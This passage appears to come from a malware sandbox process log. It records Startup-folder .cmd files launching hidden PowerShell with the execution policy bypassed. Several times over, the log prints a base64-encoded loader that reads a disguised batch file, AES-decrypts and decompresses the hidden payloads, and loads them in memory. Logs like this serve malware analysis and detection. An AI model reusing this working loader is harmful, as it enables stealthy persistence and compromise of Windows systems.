AgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCdbLTEuLi00XSAtam9pbiAnJykoW2J5dGVbXV0kcGFyYW1fdmFyKTsJJGx3YmN2PSR1cWVtYi5FbnRyeVBvaW50OwkkbHdiY3YuSW52b2tlKCRudWxsLCAkcGFyYW0yX3Zhcik7fSRob3N0LlVJLlJhd1VJLldpbmRvd1RpdGxlID0gJHBscHFsOyRnbGFweD1bU3lzdGVtLklPLkZpbGVdOjooJ3R4ZVRsbEFkYWVSJ1stMS4uLTExXSAtam9pbiAnJykoJHBscHFsKS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkdWh3IGluICRnbGFweCkgewlpZiAoJHVody5TdGFydHNXaXRoKCc6OiAnKSkJewkJJHV2cG96PSR1aHcuU3Vic3RyaW5nKDMpOwkJYnJlYWs7CX19JGtjb2FqPVtzdHJpbmdbXV0kdXZwb3ouU3BsaXQoJ1wnKTskeWNzcHE9aHRkdXMgKHpkdGd0IChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGtjb2FqWzBdKSkpOyRndGlwdT1odGR1cyAoemR0Z3QgKFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygka2NvYWpbMV0pKSk7dm1ldXAgJHljc3BxICRudWxsO3ZtZXVwICRndGlwdSAoLFtzdHJpbmdbXV0gKCclKicpKTs='))
| Invoke-Expression"
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_5d67225f.cmd"
"
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_5d67225f.cmd"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCdbLTEuLi00XSAtam9pbiAnJykoW2J5dGVbXV0kcGFyYW1fdmFyKTsJJGx3YmN2PSR1cWVtYi5FbnRyeVBvaW50OwkkbHdiY3YuSW52b2tlKCRudWxsLCAkcGFyYW0yX3Zhcik7fSRob3N0LlVJLlJhd1VJLldpbmRvd1RpdGxlID0gJHBscHFsOyRnbGFweD1bU3lzdGVtLklPLkZpbGVdOjooJ3R4ZVRsbEFkYWVSJ1stMS4uLTExXSAtam9pbiAnJykoJHBscHFsKS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkdWh3IGluICRnbGFweCkgewlpZiAoJHVody5TdGFydHNXaXRoKCc6OiAnKSkJewkJJHV2cG96PSR1aHcuU3Vic3RyaW5nKDMpOwkJYnJlYWs7CX19JGtjb2FqPVtzdHJpbmdbXV0kdXZwb3ouU3BsaXQoJ1wnKTskeWNzcHE9aHRkdXMgKHpkdGd0IChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGtjb2FqWzBdKSkpOyRndGlwdT1odGR1cyAoemR0Z3QgKFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygka2NvYWpbMV0pKSk7dm1ldXAgJHljc3BxICRudWxsO3ZtZXVwICRndGlwdSAoLFtzdHJpbmdbXV0gKCclKicpKTs='))
| Invoke-Expression"
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_9ede7b6f.cmd"
"
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_9ede7b6f.cmd"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCdbLTEuLi00XSAtam9pbiAnJykoW2J5dGVbXV0kcGFyYW1fdmFyKTsJJGx3YmN2PSR1cWVtYi5FbnRyeVBvaW50OwkkbHdiY3YuSW52b2tlKCRudWxsLCAkcGFyYW0yX3Zhcik7fSRob3N0LlVJLlJhd1VJLldpbmRvd1RpdGxlID0gJHBscHFsOyRnbGFweD1bU3lzdGVtLklPLkZpbGVdOjooJ3R4ZVRsbEFkYWVSJ1stMS4uLTExXSAtam9pbiAnJykoJHBscHFsKS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkdWh3IGluICRnbGFweCkgewlpZiAoJHVody5TdGFydHNXaXRoKCc6OiAnKSkJewkJJHV2cG96PSR1aHcuU3Vic3RyaW5nKDMpOwkJYnJlYWs7CX19JGtjb2FqPVtzdHJpbmdbXV0kdXZwb3ouU3BsaXQoJ1wnKTskeWNzcHE9aHRkdXMgKHpkdGd0IChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGtjb2FqWzBdKSkpOyRndGlwdT1odGR1cyAoemR0Z3QgKFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygka2NvYWpbMV0pKSk7dm1ldXAgJHljc3BxICRudWxsO3ZtZXVwICRndGlwdSAoLFtzdHJpbmdbXV0gKCclKicpKTs='))
| Invoke-Expression"
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_c8e68097.cmd"
"
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_c8e68097.cmd"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCdbLTEuLi00XSAtam9pbiAnJykoW2J5dGVbXV0kcGFyYW1fdmFyKTsJJGx3YmN2PSR1cWVtYi5FbnRyeVBvaW50OwkkbHdiY3YuSW52b2tlKCRudWxsLCAkcGFyYW0yX3Zhcik7fSRob3N0LlVJLlJhd1VJLldpbmRvd1RpdGxlID0gJHBscHFsOyRnbGFweD1bU3lzdGVtLklPLkZpbGVdOjooJ3R4ZVRsbEFkYWVSJ1stMS4uLTExXSAtam9pbiAnJykoJHBscHFsKS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkdWh3IGluICRnbGFweCkgewlpZiAoJHVody5TdGFydHNXaXRoKCc6OiAnKSkJewkJJHV2cG96PSR1aHcuU3Vic3RyaW5nKDMpOwkJYnJlYWs7CX19JGtjb2FqPVtzdHJpbmdbXV0kdXZwb3ouU3BsaXQoJ1wnKTskeWNzcHE9aHRkdXMgKHpkdGd0IChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGtjb2FqWzBdKSkpOyRndGlwdT1odGR1cyAoemR0Z3QgKFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygka2NvYWpbMV0pKSk7dm1ldXAgJHljc3BxICRudWxsO3ZtZXVwICRndGlwdSAoLFtzdHJpbmdbXV0gKCclKicpKTs='))
| Invoke-Expression"
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_bb8d17be.cmd"
"
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_bb8d17be.cmd"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0